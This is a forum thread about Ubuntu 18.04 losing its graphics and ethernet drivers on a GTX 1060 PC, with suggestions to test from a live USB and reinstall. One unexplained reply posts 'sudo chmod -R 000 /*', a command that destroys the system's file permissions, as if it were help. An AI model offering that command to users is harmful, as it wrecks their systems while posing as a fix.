Internet and video not working properly in Ubuntu

Hello,

I have Ubuntu 18.04 LTS. In my PC I have a GTX 1060 and on Linux boot up the animations that I would usually see for opening windows and stuff did not work anymore. In the software updates and additional drivers it said I was using the nouveau driver as usual, but it did not seem to work. Also the internet cable I have plugged in is not recognized and thus I have no internet access on linux. There does not even show that a cable is plugged in, there is nothing recognized. When I boot up Windows 10 everything works normally.

My assumption would be that the drivers did not load. Can you please help me?

Would you be able to insert a live usb with ubuntu 18.04 and see if it's still having issues? If it seems fixed on the live usb, would you be able to reinstall ubuntu on your PC?

Yeah there is no problem in reinstalling Ubuntu, I have everything backed up, but that is what I was trying to avoid. I am going to try on a live USB and maybe try to update from ISO image and see.

Did you update anything recently?

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

Yes I think there was a small update, like 100MB, but it was not a kernel update, so it should work. Anyway I solved it, I knew I need the PC today so I reinstalled Linux, now everything works fine with the latest updates.